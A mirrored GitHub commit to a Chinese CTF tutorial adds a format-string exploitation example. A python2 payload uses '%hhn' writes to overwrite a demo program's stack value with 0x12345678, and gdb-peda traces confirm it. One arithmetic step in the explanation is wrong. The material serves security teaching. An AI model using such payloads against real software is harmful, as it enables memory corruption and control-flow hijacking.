mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2025-01-27 05:57:33 +07:00
fix
This commit is contained in:
parent
70fe3201a5
commit
f40c2a69c7
@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538
|
||||
```
|
||||
把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
|
||||
```
|
||||
$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
|
||||
```
|
||||
其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
|
||||
```
|
||||
$ gdb -q a.out
|
||||
Reading symbols from a.out...(no debugging symbols found)...done.
|
||||
gdb-peda$ b printf
|
||||
Breakpoint 1 at 0x8048350
|
||||
gdb-peda$ r < text
|
||||
Starting program: /home/firmy/Desktop/RE4B/a.out < text
|
||||
[----------------------------------registers-----------------------------------]
|
||||
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||
ECX: 0x1
|
||||
EDX: 0xf7f9883c --> 0x0
|
||||
ESI: 0xf7f96e68 --> 0x1bad90
|
||||
EDI: 0x0
|
||||
EBP: 0xffffd5f8 --> 0x0
|
||||
ESP: 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||
EIP: 0xf7e27c20 (<printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
|
||||
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
|
||||
[-------------------------------------code-------------------------------------]
|
||||
0xf7e27c1b <fprintf+27>: ret
|
||||
0xf7e27c1c: xchg ax,ax
|
||||
0xf7e27c1e: xchg ax,ax
|
||||
=> 0xf7e27c20 <printf>: call 0xf7f06d17 <__x86.get_pc_thunk.ax>
|
||||
0xf7e27c25 <printf+5>: add eax,0x16f243
|
||||
0xf7e27c2a <printf+10>: sub esp,0xc
|
||||
0xf7e27c2d <printf+13>: mov eax,DWORD PTR [eax+0x124]
|
||||
0xf7e27c33 <printf+19>: lea edx,[esp+0x14]
|
||||
No argument
|
||||
[------------------------------------stack-------------------------------------]
|
||||
0000| 0xffffd52c --> 0x8048520 (<main+138>: add esp,0x20)
|
||||
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
0008| 0xffffd534 --> 0x1
|
||||
0012| 0xffffd538 --> 0x88888888
|
||||
0016| 0xffffd53c --> 0xffffffff
|
||||
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
|
||||
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||
[------------------------------------------------------------------------------]
|
||||
Legend: code, data, rodata, value
|
||||
|
||||
Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||
gdb-peda$ x/20x $esp
|
||||
0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
|
||||
0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
|
||||
0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
|
||||
0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
|
||||
0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
|
||||
gdb-peda$ finish
|
||||
Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
|
||||
[----------------------------------registers-----------------------------------]
|
||||
EAX: 0x312
|
||||
EBX: 0x804a000 --> 0x8049f14 --> 0x1
|
||||
ECX: 0x0
|
||||
EDX: 0xf7f98830 --> 0x0
|
||||
ESI: 0xf7f96e68 --> 0x1bad90
|
||||
EDI: 0x0
|
||||
EBP: 0xffffd5f8 --> 0x0
|
||||
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
EIP: 0x8048520 (<main+138>: add esp,0x20)
|
||||
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
|
||||
[-------------------------------------code-------------------------------------]
|
||||
0x8048514 <main+126>: lea eax,[ebp-0x94]
|
||||
0x804851a <main+132>: push eax
|
||||
0x804851b <main+133>: call 0x8048350 <printf@plt>
|
||||
=> 0x8048520 <main+138>: add esp,0x20
|
||||
0x8048523 <main+141>: sub esp,0xc
|
||||
0x8048526 <main+144>: push 0xa
|
||||
0x8048528 <main+146>: call 0x8048370 <putchar@plt>
|
||||
0x804852d <main+151>: add esp,0x10
|
||||
[------------------------------------stack-------------------------------------]
|
||||
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
0004| 0xffffd534 --> 0x1
|
||||
0008| 0xffffd538 --> 0x12345678
|
||||
0012| 0xffffd53c --> 0xffffffff
|
||||
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
|
||||
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
|
||||
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
|
||||
0028| 0xffffd54c --> 0x80484b0 (<main+26>: add ebx,0x1b50)
|
||||
[------------------------------------------------------------------------------]
|
||||
Legend: code, data, rodata, value
|
||||
0x08048520 in main ()
|
||||
gdb-peda$ x/20x $esp
|
||||
0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
|
||||
0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
|
||||
0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
|
||||
0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
|
||||
0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
|
||||
```
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user